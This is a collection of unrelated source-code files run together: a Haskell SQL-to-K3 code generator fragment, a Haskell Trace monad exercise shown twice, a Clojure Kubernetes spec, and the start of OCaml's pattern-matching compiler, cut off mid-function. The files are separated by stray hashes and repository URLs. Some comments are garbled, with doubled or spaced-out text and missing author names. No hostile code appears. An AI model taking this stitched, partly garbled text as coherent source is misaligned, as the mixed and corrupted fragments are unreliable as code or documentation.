cgaggregates subqbs i sid l = foldM (cgaggregate subqbs sid) (i, [], []) l
cgaggregate subqbs sid (i, eacc, mrgacc) si = do
(ni, n) <- selectItemId i si
cgaccaggregate subqbs sid eacc mrgacc ni n si
cgaccaggregate subqbs sid eacc mrgacc i n si =
cgaggexpr subqbs sid si >>= \(rE, mergeE) -> return (i, eacc ++ [(n, rE)], mrgacc ++ [(n, mergeE)])
cgconjunct subqbs sid eacc e = cgexpr subqbs Nothing sid e >>= \e' -> return $ EC.binop OAnd eacc e'
cgaggexpr subqbs sid si = do
(e, aggFn) <- aggregateexpr si
aE <- cgexpr subqbs Nothing sid e
return $ case aggFn of
AggSum -> (binagg OAdd aE, mergeagg OAdd)
AggCount -> (binagg OAdd $ EC.constant $ CInt 1, mergeagg OAdd)
AggMin -> (binapp "min" aE, mergeapp "min")
AggMax -> (binapp "max" aE, mergeapp "max")
where binagg op e = EC.lambda "aggacc" $ EC.binop op (EC.variable "aggacc") e
binapp f e = EC.lambda "aggacc" $ EC.applyMany (EC.variable f) [EC.variable "aggacc", e]
mergeagg op = EC.lambda "a" $ EC.lambda "b" $ EC.binop op (EC.variable "a") $ EC.variable "b"
mergeapp f = EC.lambda "a" $ EC.lambda "b" $ EC.applyMany (EC.variable f) [EC.variable "a", EC.variable "b"]
    -- TODO: Cast, Interval, LiftOperator, NullLit, Placeholder, PositionalArg, WindowFn
cgexpr _ _ _ (BooleanLit _ b) = return $ EC.constant $ CBool b
cgexpr _ _ _ (NumberLit _ i) = return $ if "." `isInfixOf` i
then EC.constant $ CReal $ read i
else EC.constant $ CInt $ read i
cgexpr _ _ _ (StringLit _ s) = return $ EC.constant $ CString s
cgexpr _ _ _ (TypedStringLit _ tn s) = do
t <- sqlnamedtype tn
case (tag t, find isTProperty $ annotations t) of
(TInt, Just (TProperty (tPropertyName -> "TPCHDate"))) -> return $ EC.constant $ CInt $ read $ filter (/= '-') s
(_, _) -> throwE $ boxToString $ ["Unsupported constructor for"] %$ prettyLines t
cgexpr _ _ _ (Identifier _ (sqlnmcomponent -> i)) = return $ EC.variable i
cgexpr _ _ sid (QIdentifier _ nmcl) = do
ptr <- sqcflkupM sid $ sqlnmpath nmcl
EC.variable . adnn <$> sqglkupM ptr
cgexpr subqbs f sid (Case _ whens elseexpr) = cgcase subqbs f sid elseexpr whens
cgexpr subqbs f sid (CaseSimple _ expr whens elseexpr) = cgcasesimple subqbs f sid expr elseexpr whens
cgexpr subqbs f sid e@(FunCall _ nm args) = do
isAgg <- isAggregate e
if isAgg then do
(agge,_) <- cgaggexpr subqbs sid (SelExp emptyAnnotation e)
maybe err ($ agge) f
else do
let fn = sqlnm nm
case sqloperator fn args of
(Just (UnaryOp o x)) -> EC.unop o <$> cgexpr subqbs f sid x
(Just (BinaryOp o x y)) -> EC.binop o <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y
_ -> do
case (fn, args) of
("!between", [x,y,z]) ->
let cg a b c = EC.binop OAnd (EC.binop OLeq b a) $ EC.binop OLeq a c
in cg <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y <*> cgexpr subqbs f sid z
              -- TODO
("!like", [_,_]) -> throwE $ "LIKE operator not yet implemented"
("!notlike", [_,_]) -> throwE $ "NOTLIKE operator not yet implemented"
(_, _) -> EC.applyMany (EC.variable fn) <$> mapM (cgexpr subqbs f sid) args
where err = throwE "Invalid aggregate expression in cgexpr"
cgexpr _ _ sid (Star _) = do
(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
recE <$> mapM (\p -> singletonPath p >>= \j -> return (j, EC.variable j)) ord
cgexpr _ _ sid (QStar _ (sqlnmcomponent -> i)) = do
qattrs <- sqclkupM sid >>= qualifiedAttrs [i] >>= attrIds
recE <$> mapM (\j -> return (j, EC.variable j)) qattrs
cgexpr subqbs _ _ e@(Exists _ _) = do
(subexpr, _, _) <- cgsubquery subqbs e
emptyE False subexpr
cgexpr subqbs _ _ e@(ScalarSubQuery _ _) = cgsubquery subqbs e >>= \(r,_,_) -> return r
cgexpr subqbs f sid (InPredicate _ ine isIn (InList _ el)) = do
testexpr <- cgexpr subqbs f sid ine
valexprs <- mapM (cgexpr subqbs f sid) el
case valexprs of
[] -> return $ EC.constant $ CBool $ not isIn
(h:t) -> memoE (immutE $ testexpr) $
\vare -> return $ foldl (\accE vale -> mergeE accE $ testE vare vale) (testE vare h) t
where testE vare vale = EC.binop (if isIn then OEqu else ONeq) vare vale
mergeE acce nexte = EC.binop (if isIn then OOr else OAnd) acce nexte
cgexpr subqbs f sid e@(InPredicate _ ine isIn (InQueryExpr _ _)) = do
testexpr <- cgexpr subqbs f sid ine
(subexpr, osid, bm) <- cgsubquery subqbs e
memberE isIn osid bm testexpr subexpr
cgexpr _ _ _ e = throwE $ "Unhandled expression in codegen: " ++ show e
cgcase _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcase"
cgcase subqbs f sid elseexpr whens@((_,e):_) = do
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebranch subqbs f sid) elseE whens
cgcasesimple _ _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcasesimple"
cgcasesimple subqbs f sid expr elseexpr whens@((_, e):_) = do
valE <- cgexpr subqbs f sid expr
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebrancheq subqbs f sid valE) elseE whens
cgcasebranch subqbs f sid elseE (l,e) = do
predE <- case l of
[] -> throwE "Invalid case-branch-list"
[x] -> cgexpr subqbs Nothing sid x
h:t -> cgexpr subqbs Nothing sid h >>= \hE -> foldM (cgconjunct subqbs sid) hE t
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse predE thenE elseE
cgcasebrancheq subqbs f sid valE elseE (l,e) = do
testValE <- case l of
[x] -> cgexpr subqbs Nothing sid x
_ -> throwE "Invalid case-branch-eq-list"
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse (EC.binop OEqu valE testValE) thenE elseE
cgsubquery subqbs e =
case lookup e subqbs of
Nothing -> throwE $ "Found a subquery without a binding: " ++ show e
Just (_, qcl) -> cgclosure qcl >>= \(r, osid, bm, _) -> return (r, osid, bm)
bindingMap l = foldM qualifyBindings (BMTVPartition Map.empty) l
qualifyBindings (BMTVPartition acc) (qual, Just aenv, bm) = do
f <- case bm of
BMNone -> return $ commonNoneBinding qual
BMTPrefix i -> return $ commonPrefixBinding qual i
BMTFieldMap fb -> return $ commonFieldBinding qual fb
_ -> throwE "Cannot qualify partitioned bindings"
return $ BMTVPartition $ Map.foldlWithKey f acc aenv
qualifyBindings _ _ = throwE "Cannot qualify partitioned bindings"
commonNoneBinding qual acc path _ = case path of
[i] -> Map.insert i (qual, Nothing) acc
_ -> acc
commonPrefixBinding qual pfx acc path _ = case path of
[i] -> Map.insert i (qual, Just $ Left pfx) acc
_ -> acc
commonFieldBinding qual fb acc path _ = case path of
[i] -> maybe acc (\typePath -> Map.insert i (qual, Just $ Right typePath) acc) $ Map.lookup i fb
_ -> acc
filterChainE :: ScopeId -> BindingMap -> SubqueryBindings -> K3 Expression -> ScalarExpr -> SQLParseM (K3 Expression)
filterChainE sid bm subqbs eacc e = do
i <- uniqueScopeQualifier sid
filterE <- cgexpr subqbs Nothing sid e
bodyE <- bindE sid bm (Just i) filterE
return $ EC.applyMany (EC.project "filter" eacc) [EC.lambda i bodyE]
annotateTriggerBody i (QueryPlan tOpt chains _) mergeOpt e = do
if distributed
then case tOpt of
Just (isEquiJoin -> True) ->
return $ e @+ (EApplyGen True "DistributedHashJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (isJoin -> True) ->
return $ e @+ (EApplyGen True "BroadcastJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (treeChains -> Just chains) | not (null chains) && isGroupByAggregatePath (last chains) ->
case mergeOpt of
Just mergeF -> return $ e @+ (EApplyGen True "DistributedGroupBy2"
$ Map.fromList [("lbl", SLabel i), ("merge", SExpr mergeF)])
Nothing -> throwE "No merge function found for group-by stage"
_ -> return e
else maybe (return e) (const $ joinBarrier e) $ Map.lookup i stagechildren
joinBarrier e = mkCountBarrier e $ EC.constant $ CInt 2
mkCountBarrier e countE = do
args <- barrierArgs countE
return $ e @+ EApplyGen True "OnCounter" args
barrierArgs countE = do
lblsym <- slblsextM
return $ Map.fromList [ ("id", SLabel $ "barrier" ++ show lblsym)
, ("eq", SExpr $ countE)
, ("reset", SExpr $ EC.constant $ CBool False)
, ("profile", SExpr $ EC.constant $ CBool False) ]
master = DC.global "master" (immutT TC.address) Nothing
mkLoader (i,t) = do
dt <- twrapcolelemM t
let pathCT = (TC.collection $ recT [("path", TC.string)]) @+ TAnnotation "Collection"
let rexpr = EC.applyMany (EC.variable $ i ++ "LoaderE") [EC.variable $ i ++ "Files", EC.variable i]
return $
([(DC.global (i ++ "LoaderE") (immutT $ TC.function pathCT $ TC.function dt TC.unit) Nothing) @+ cArgsProp 2,
DC.global (i ++ "Files") (immutT pathCT) Nothing],
rexpr)
mkPeerInit exprs =
[DC.trigger "startPeer" TC.unit $ EC.lambda "_" $
EC.block $ exprs ++ [EC.send (EC.variable "start") (EC.variable $ if distributed then "master" else "me") EC.unit]]
mkInit decls = do
sendsE <- if distributed then
let startE = EC.block $ flip map stageinits $ \i ->
EC.applyMany (EC.project "iterate" $ EC.variable "peers")
[EC.lambda "p" $ EC.send (EC.variable $ trig i) (EC.project "addr" $ EC.variable "p") EC.unit]
in mkCountBarrier startE $ EC.applyMany (EC.project "size" $ EC.variable "peers") [EC.unit]
else return $ EC.block $ map (\i -> EC.send (EC.variable i) (EC.variable "me") EC.unit) $ foldl declTriggers [] decls
return $ [DC.trigger "start" TC.unit $ EC.lambda "_" $
EC.block $ [EC.unit @+ EApplyGen True "SQL" Map.empty, sendsE]]
declTriggers acc (tag -> DTrigger i _ _) = acc ++ [i]
declTriggers acc _ = acc
-- | Render each SQL declaration as a human-readable string:
--   tables and stages print their name and type, queries print their plan.
sqlstringify :: [SQLDecl] -> SQLParseM [String]
sqlstringify stmts = mapM prettystmt stmts
  where prettystmt (SQLRel (i, t)) = return $ boxToString $ [unwords ["Table:", i]] %$ prettyLines t
        prettystmt (SQLStage (i, t)) = return $ boxToString $ [unwords ["Stage:", i]] %$ prettyLines t
        prettystmt (SQLQuery plan) = return $ boxToString $ ["Plan: "] %$ prettyLines plan
sqldepgraph :: [SQLDecl] -> SQLParseM [String]
sqldepgraph stmts = mapM depgraph stmts >>= return . concat
where depgraph (SQLRel _) = return []
depgraph (SQLStage _) = return []
depgraph (SQLQuery (QueryPlan Nothing [] _)) = return []
depgraph (SQLQuery (QueryPlan Nothing chains _)) = chaseScope $ pcoutsid $ last chains
depgraph (SQLQuery (QueryPlan (Just t) chains _)) = treeSchema t >>= \sid -> chaseScope $ chainSchema sid chains
chaseScope sid = do
sf <- sqclkupM sid
ptrs <- sqcfptrsM sid
nodes <- mapM (adgchaseNodesM []) ptrs >>= return . nub . concat
return $ [unwords ["Scope", show sid, show sf, show ptrs]] ++ (indent 2 $ adgnodes nodes)
adgnodes nodes = map (\(p,node) -> unwords [show p, show $ adnn node, show $ adnr node, show $ adnch node])
$ sortBy (compare `on` fst) nodes
-- | Apply a chain of record projections to an expression, left to right.
projectPathE :: K3 Expression -> [Identifier] -> K3 Expression
projectPathE = foldl (flip EC.project)
-- | Access field @i@ of a bound value according to its type mapping:
--   no mapping leaves the expression untouched, a prefix mapping projects
--   through an intermediate field first, and a type-path mapping follows
--   the full projection path.
fieldE :: TypeMapping -> Identifier -> K3 Expression -> K3 Expression
fieldE tm i e = case tm of
  Nothing         -> e
  Just (Left pfx) -> EC.project i (EC.project pfx e)
  Just (Right tp) -> projectPathE e tp
-- | Rebuild a record expression from variable @i@, extracting each field in
--   @ids@ out of @i@ via the type paths in @fb@.
--   Fails if any requested field has no binding in the map.
namedRecordE :: Identifier -> Map Identifier TypePath -> [Identifier] -> SQLParseM (K3 Expression)
namedRecordE i fb ids = foldM field [] ids >>= return . recE
  where field acc j = maybe (err j) (\tp -> return $ acc ++ [(j, projectPathE (EC.variable i) tp)]) $ Map.lookup j fb
        err j = throwE $ "No field binding found in namedRecordE for " ++ show j
-- | Rebuild a record whose fields may come from different source variables:
--   @pb@ maps each field to its source variable and that variable's type
--   mapping. Fails on fields absent from the partition map.
compositeRecordE :: Map Identifier (Identifier, TypeMapping) -> [Identifier] -> SQLParseM (K3 Expression)
compositeRecordE pb ids = foldM field [] ids >>= return . recE
  where field acc i = maybe (err i) (\(v, tm) -> return $ acc ++ [(i, fieldE tm i $ EC.variable v)]) $ Map.lookup i pb
        err i = throwE $ "No field binding found in compositeRecordE for " ++ show i
-- | Wrap expression @e@ in a bind-as over the attributes of scope @sid@,
--   destructuring the source value according to the binding map:
--   BMNone binds the variable directly as a record; BMTPrefix projects the
--   named field first; BMTFieldMap reconstructs a record via per-field type
--   paths; BMTVPartition reconstructs a record from several source variables
--   (and needs no binding variable).
bindE :: ScopeId -> BindingMap -> Maybe Identifier -> K3 Expression -> SQLParseM (K3 Expression)
bindE sid bm iOpt e = do
  ids <- sqclkupM sid >>= unqualifiedAttrs
  case (iOpt, bm) of
    (Just i, BMNone) -> return $ EC.bindAs (EC.variable i) (BRecord $ zip ids ids) e
    (Just i, BMTPrefix j) -> return $ EC.bindAs (EC.project j $ EC.variable i) (BRecord $ zip ids ids) e
    (Just i, BMTFieldMap fb) -> do
      initE <- namedRecordE i fb ids
      return $ EC.bindAs initE (BRecord $ zip ids ids) e
    (_, BMTVPartition pb) -> do
      initE <- compositeRecordE pb ids
      return $ EC.bindAs initE (BRecord $ zip ids ids) e
    _ -> throwE "Invalid binding variable in bindE"
-- | Like 'bindE' but without a body: produce an expression that materializes
--   the scope's attributes as a record, according to the binding map.
concatE :: ScopeId -> BindingMap -> Maybe Identifier -> SQLParseM (K3 Expression)
concatE sid bm iOpt = do
  ids <- sqclkupM sid >>= unqualifiedAttrs
  case (iOpt, bm) of
    (Just i, BMNone) -> return $ EC.variable i
    (Just i, BMTPrefix j) -> return $ EC.project j $ EC.variable i
    (Just i, BMTFieldMap fb) -> namedRecordE i fb ids
    (_, BMTVPartition pb) -> compositeRecordE pb ids
    _ -> throwE "Invalid binding variable in concatE"
-- | Apply a per-field aggregate function to the matching field of the
--   accumulator record bound to the given variable.
aggE :: Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggE accVar (field, aggF) =
  (field, EC.applyMany aggF [EC.project field (EC.variable accVar)])
-- | Merge the same field of two partial-aggregate records with the given
--   binary merge function.
aggMergeE :: Identifier -> Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggMergeE lhs rhs (field, mergeF) =
  (field, EC.applyMany mergeF [ EC.project field (EC.variable lhs)
                              , EC.project field (EC.variable rhs) ])
-- | Default ("zero") expression for a list of named fields: unit when empty,
--   the lone field's default for a singleton, otherwise a record default.
zeroE :: [(Identifier, K3 Type)] -> SQLParseM (K3 Expression)
zeroE [] = return EC.unit
zeroE [(_,t)] = either throwE return $ defaultExpression t
zeroE l = either throwE return $ defaultExpression $ recT l
-- | Type counterpart of 'zeroE': unit when empty, the lone field's type for
--   a singleton, otherwise a record type.
zeroT :: [(Identifier, K3 Type)] -> SQLParseM (K3 Type)
zeroT fields = return $ case fields of
  []       -> TC.unit
  [(_, t)] -> t
  _        -> recT fields
-- | Default ("zero") expression for the K3 type of a SQL scalar expression.
zeroSQLE :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Expression)
zeroSQLE sidOpt e = do
  t <- scalarexprType sidOpt e
  either throwE return (defaultExpression t)
-- TODO:
-- | Let-bind @srcE@ under the name "__memo" and hand the bound variable to
--   @bodyF@, so the source expression is evaluated at most once.
--   Constants and variables are cheap to duplicate and are passed through
--   without binding.
--   NOTE(review): the fixed name "__memo" could shadow an outer "__memo" if
--   uses are nested -- confirm callers never nest this.
memoE :: K3 Expression -> (K3 Expression -> SQLParseM (K3 Expression)) -> SQLParseM (K3 Expression)
memoE srcE bodyF = case tag srcE of
  EConstant _ -> bodyF srcE
  EVariable _ -> bodyF srcE
  _ -> do { be <- bodyF $ EC.variable "__memo";
            return $ EC.letIn "__memo" (immutE srcE) $ be }
-- | Build a filter over @colexpr@ keeping elements equal to @elemexpr@.
--   The scope must expose exactly one unqualified attribute, which is the
--   match target; @elemexpr@ is memoized so it is evaluated at most once.
matchE :: ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
matchE sid bm elemexpr colexpr = do
  ids <- sqclkupM sid >>= unqualifiedAttrs
  targetE <- matchTargetE ids
  memoE (immutE elemexpr) $ \e -> do
    bodyE <- bindE sid bm (Just "__x") $ EC.binop OEqu targetE e
    return $ EC.applyMany (EC.project "filter" $ colexpr) [EC.lambda "__x" bodyE]
  where matchTargetE [x] = return $ EC.variable x
        matchTargetE l = throwE $ "Invalid match targets: " ++ show l
-- | Membership (or non-membership, when @asMem@ is False) test of
--   @elemexpr@ against collection @colexpr@, via a filter plus size check.
memberE :: Bool -> ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
memberE asMem sid bm elemexpr colexpr = do
  matchesE <- matchE sid bm elemexpr colexpr
  emptyE (not asMem) matchesE
-- | Emptiness (or non-emptiness) test of a collection, comparing its size
--   against zero.
emptyE :: Bool -> K3 Expression -> SQLParseM (K3 Expression)
emptyE asEmpty colexpr =
  let sizeE = EC.applyMany (EC.project "size" colexpr) [EC.unit]
      cmpOp = if asEmpty then OEqu else ONeq
  in return $ EC.binop cmpOp sizeE (EC.constant $ CInt 0)
-- | Declaration property recording the number of arguments expected by an
--   externally-implemented function.
cArgsProp :: Int -> Annotation Declaration
cArgsProp n = DProperty (Left ("CArgs", Just (LC.int n)))
-- | Lay out a list of pretty-printable items as tree branches:
--   "+- " for every item but the last, "`- " for the last.
prettyList :: (Pretty a) => [a] -> [String]
prettyList [] = []
prettyList [x] = "|" : (shift "`- " " " $ prettyLines x)
prettyList l = "|" : (concatMap (\x -> shift "+- " "| " $ prettyLines x) (init l)
               ++ ["|"] ++ (shift "`- " " " $ prettyLines $ last l))
instance Pretty (Tree PlanNode) where
prettyLines (Node (PJoin psid osid jt jeq jp _ chains) ch) =
[unwords ["Join", show psid, show osid, show jt, "equalities", show $ length jeq, "preds", show $ length jp]]
++ prettyList chains ++ drawSubTrees ch
prettyLines (Node (PTable n sid _ _ chains) _) =
[unwords ["Table", n, show sid]] ++ prettyList chains
prettyLines (Node (PSubquery _ qcl) _) = ["Subquery", "|"] ++ (shift "`- " " " $ prettyLines qcl)
instance Pretty QueryClosure where
prettyLines (QueryClosure _ plan) = ["QueryClosure", "|"] ++ (shift "`- " " " $ prettyLines plan)
instance Pretty QueryPlan where
prettyLines (QueryPlan treeOpt chains stgOpt) =
["QueryPlan " ++ maybe "" id stgOpt] ++ (maybe [] treeF treeOpt) ++ prettyList chains
where treeF t = if null chains then "|" : (shift "`- " " " $ prettyLines t)
else "|" : (shift "+- " "| " $ prettyLines t)
instance Pretty PlanCPath where
prettyLines (PlanCPath sid selects gbs prjs aggs having _) =
[unwords ["PlanCPath", show sid
, "sels", show $ length selects
, "gbys", show $ length gbs
, "prjs", show $ length prjs
, "aggs", show $ length aggs
, maybe "<no having>" (const "having") having]]
|
34c668e981e3ae5fe914409a8461d672856b10e2c29da77fc3d02707bc169bb7 | raviksharma/bartosz-basics-of-haskell | trace.hs | Ex 2 . Define a monad instance for Trace ( no need to override fail ) . The idea is to create a trace of execution by sprinkling you code with calls to put . The result of executing this code should look something like this :
--
-- ["fact 3","fact 2","fact 1","fact 0"]
-- 6
--
-- Hint: List concatenation is done using ++ (we've seen it used for string
-- concatenation, because String is just a list of Char).
import Control.Applicative
import Control.Monad (liftM, ap)
-- | A writer-like monad that accumulates a list of trace messages alongside
--   a result value. Binding two Traces concatenates their message lists.
newtype Trace a = Trace ([String], a)

instance Functor Trace where
  fmap f (Trace (lst, x)) = Trace (lst, f x)

instance Applicative Trace where
  -- Define 'pure' directly instead of the deprecated circular wiring
  -- 'pure = return' / 'return x = ...' (GHC's monad-of-no-return cleanup:
  -- 'return' now defaults to 'pure' and need not be defined).
  pure x = Trace ([], x)
  Trace (lst, f) <*> Trace (lst', x) = Trace (lst ++ lst', f x)

instance Monad Trace where
  -- 'return' is inherited from 'pure'; only (>>=) needs a definition.
  (Trace (lst, x)) >>= k =
    let Trace (lst', y) = k x
    in Trace (lst ++ lst', y)
-- | Record a single trace entry of the form "<msg> <shown value>".
put :: Show a => String -> a -> Trace ()
put msg v = Trace ([unwords [msg, show v]], ())
-- | Factorial instrumented with one trace entry per call.
fact :: Integer -> Trace Integer
fact n = put "fact" n >> compute
  where
    compute
      | n == 0    = return 1
      | otherwise = fmap (n *) (fact (n - 1))
-- Run the traced factorial of 3, then print the accumulated trace
-- (["fact 3","fact 2","fact 1","fact 0"]) followed by the result (6).
main = let Trace (lst, m) = fact 3
       in do
            print lst
            print m
| null | https://raw.githubusercontent.com/raviksharma/bartosz-basics-of-haskell/86d40d831f61415ef0022bff7fe7060ae6a23701/10-error-handling/trace.hs | haskell |
["fact 3","fact 2","fact 1","fact 0"] | Ex 2 . Define a monad instance for Trace ( no need to override fail ) . The idea is to create a trace of execution by sprinkling you code with calls to put . The result of executing this code should look something like this :
6
Hint : List concatenation is done using + + ( we 've seen it used for string concatenation , because is just a list of ) .
import Control.Applicative
import Control.Monad (liftM, ap)
newtype Trace a = Trace ([String], a)
instance Functor Trace where
fmap = liftM
instance Applicative Trace where
pure = return
(<*>) = ap
instance Monad Trace where
return x = Trace ([], x)
(Trace (lst, x)) >>= k =
let Trace (lst', y) = k x
in Trace (lst ++ lst', y)
put :: Show a => String -> a -> Trace ()
put msg v = Trace ([msg ++ " " ++ show v], ())
fact :: Integer -> Trace Integer
fact n = do
put "fact" n
if n == 0
then return 1
else do
m <- fact (n - 1)
return (n * m)
main = let Trace (lst, m) = fact 3
in do
print lst
print m
|
d4875e90bab521ec63499378715fb0129e01aad79ec896d9aadb0a1e86f2f5a4 | exoscale/clojure-kubernetes-client | v1_subject_access_review_status.clj | (ns clojure-kubernetes-client.specs.v1-subject-access-review-status
(:require [clojure.spec.alpha :as s]
[spec-tools.data-spec :as ds]
)
(:import (java.io File)))
(declare v1-subject-access-review-status-data v1-subject-access-review-status)
(def v1-subject-access-review-status-data
{
(ds/req :allowed) boolean?
(ds/opt :denied) boolean?
(ds/opt :evaluationError) string?
(ds/opt :reason) string?
})
(def v1-subject-access-review-status
(ds/spec
{:name ::v1-subject-access-review-status
:spec v1-subject-access-review-status-data}))
| null | https://raw.githubusercontent.com/exoscale/clojure-kubernetes-client/79d84417f28d048c5ac015c17e3926c73e6ac668/src/clojure_kubernetes_client/specs/v1_subject_access_review_status.clj | clojure | (ns clojure-kubernetes-client.specs.v1-subject-access-review-status
(:require [clojure.spec.alpha :as s]
[spec-tools.data-spec :as ds]
)
(:import (java.io File)))
(declare v1-subject-access-review-status-data v1-subject-access-review-status)
(def v1-subject-access-review-status-data
{
(ds/req :allowed) boolean?
(ds/opt :denied) boolean?
(ds/opt :evaluationError) string?
(ds/opt :reason) string?
})
(def v1-subject-access-review-status
(ds/spec
{:name ::v1-subject-access-review-status
:spec v1-subject-access-review-status-data}))
| |
456354bb4627b97c76c0743f4dbbe0f9526efaab0e1578251c24443d7ea69199 | rescript-lang/rescript-compiler | matching.ml | (**************************************************************************)
(* *)
(* OCaml *)
(* *)
, projet Cristal , INRIA Rocquencourt
(* *)
Copyright 1996 Institut National de Recherche en Informatique et
(* en Automatique. *)
(* *)
(* All rights reserved. This file is distributed under the terms of *)
the GNU Lesser General Public License version 2.1 , with the
(* special exception on linking described in the file LICENSE. *)
(* *)
(**************************************************************************)
(* Compilation of pattern matching *)
open Misc
open Asttypes
open Types
open Typedtree
open Lambda
open Parmatch
open Printf
let dbg = false
See Peyton - Jones , ` ` The Implementation of functional programming
languages '' , chapter 5 .
languages'', chapter 5. *)
Well , it was true at the beginning of the world .
Now , see Lefessant - Maranget ` ` Optimizing Pattern - Matching '' ICFP'2001
Well, it was true at the beginning of the world.
Now, see Lefessant-Maranget ``Optimizing Pattern-Matching'' ICFP'2001
*)
Compatibility predicate that considers potential rebindings of constructors
of an extension type .
" may_compat p q " returns false when p and q never admit a common instance ;
returns true when they may have a common instance .
Compatibility predicate that considers potential rebindings of constructors
of an extension type.
"may_compat p q" returns false when p and q never admit a common instance;
returns true when they may have a common instance.
*)
module MayCompat =
Parmatch.Compat (struct let equal = Types.may_equal_constr end)
let may_compat = MayCompat.compat
and may_compats = MayCompat.compats
(*
Many functions on the various data structures of the algorithm :
- Pattern matrices.
- Default environments: mapping from matrices to exit numbers.
- Contexts: matrices whose column are partitioned into
left and right.
- Jump summaries: mapping from exit numbers to contexts
*)
let string_of_lam lam =
Printlambda.lambda Format.str_formatter lam ;
Format.flush_str_formatter ()
type matrix = pattern list list
let add_omega_column pss = List.map (fun ps -> omega::ps) pss
type ctx = {left:pattern list ; right:pattern list}
let pretty_ctx ctx =
List.iter
(fun {left=left ; right=right} ->
prerr_string "LEFT:" ;
pretty_line left ;
prerr_string " RIGHT:" ;
pretty_line right ;
prerr_endline "")
ctx
let le_ctx c1 c2 =
le_pats c1.left c2.left &&
le_pats c1.right c2.right
let lshift {left=left ; right=right} = match right with
| x::xs -> {left=x::left ; right=xs}
| _ -> assert false
let lforget {left=left ; right=right} = match right with
| _::xs -> {left=omega::left ; right=xs}
| _ -> assert false
let rec small_enough n = function
| [] -> true
| _::rem ->
if n <= 0 then false
else small_enough (n-1) rem
let ctx_lshift ctx =
if small_enough 31 ctx then
List.map lshift ctx
else (* Context pruning *) begin
get_mins le_ctx (List.map lforget ctx)
end
let rshift {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=p::right}
| _ -> assert false
let ctx_rshift ctx = List.map rshift ctx
let rec nchars n ps =
if n <= 0 then [],ps
else match ps with
| p::rem ->
let chars, cdrs = nchars (n-1) rem in
p::chars,cdrs
| _ -> assert false
let rshift_num n {left=left ; right=right} =
let shifted,left = nchars n left in
{left=left ; right = shifted@right}
let ctx_rshift_num n ctx = List.map (rshift_num n) ctx
Recombination of contexts ( eg : ( _ , _ ): : p1::p2::rem - > ( )
All mutable fields are replaced by ' _ ' , since side - effects in
guards can alter these fields
All mutable fields are replaced by '_', since side-effects in
guards can alter these fields *)
let combine {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=set_args_erase_mutable p right}
| _ -> assert false
let ctx_combine ctx = List.map combine ctx
let ncols = function
| [] -> 0
| ps::_ -> List.length ps
exception NoMatch
exception OrPat
let filter_matrix matcher pss =
let rec filter_rec = function
| (p::ps)::rem ->
begin match p.pat_desc with
| Tpat_alias (p,_,_) ->
filter_rec ((p::ps)::rem)
| Tpat_var _ ->
filter_rec ((omega::ps)::rem)
| _ ->
begin
let rem = filter_rec rem in
try
matcher p ps::rem
with
| NoMatch -> rem
| OrPat ->
match p.pat_desc with
| Tpat_or (p1,p2,_) -> filter_rec [(p1::ps) ;(p2::ps)]@rem
| _ -> assert false
end
end
| [] -> []
| _ ->
pretty_matrix pss ;
fatal_error "Matching.filter_matrix" in
filter_rec pss
let make_default matcher env =
let rec make_rec = function
| [] -> []
| ([[]],i)::_ -> [[[]],i]
| (pss,i)::rem ->
let rem = make_rec rem in
match filter_matrix matcher pss with
| [] -> rem
| ([]::_) -> ([[]],i)::rem
| pss -> (pss,i)::rem in
make_rec env
let ctx_matcher p =
let p = normalize_pat p in
match p.pat_desc with
| Tpat_construct (_, cstr,omegas) ->
(fun q rem -> match q.pat_desc with
| Tpat_construct (_, cstr',args)
NB : may_constr_equal considers ( potential ) constructor rebinding
when Types.may_equal_constr cstr cstr' ->
p,args@rem
| Tpat_any -> p,omegas @ rem
| _ -> raise NoMatch)
| Tpat_constant cst ->
(fun q rem -> match q.pat_desc with
| Tpat_constant cst' when const_compare cst cst' = 0 ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_variant (lab,Some omega,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',Some arg,_) when lab=lab' ->
p,arg::rem
| Tpat_any -> p,omega::rem
| _ -> raise NoMatch)
| Tpat_variant (lab,None,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',None,_) when lab=lab' ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_array omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_array args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
| Tpat_tuple omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_tuple args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
Records are normalized
let len = Array.length lbl.lbl_all in
(fun q rem -> match q.pat_desc with
| Tpat_record (((_, lbl', _) :: _) as l',_)
when Array.length lbl'.lbl_all = len ->
let l' = all_record_args l' in
p, List.fold_right (fun (_, _,p) r -> p::r) l' rem
| Tpat_any -> p,List.fold_right (fun (_, _,p) r -> p::r) l rem
| _ -> raise NoMatch)
| Tpat_lazy omega ->
(fun q rem -> match q.pat_desc with
| Tpat_lazy arg -> p, (arg::rem)
| Tpat_any -> p, (omega::rem)
| _ -> raise NoMatch)
| _ -> fatal_error "Matching.ctx_matcher"
let filter_ctx q ctx =
let matcher = ctx_matcher q in
let rec filter_rec = function
| ({right=p::ps} as l)::rem ->
begin match p.pat_desc with
| Tpat_or (p1,p2,_) ->
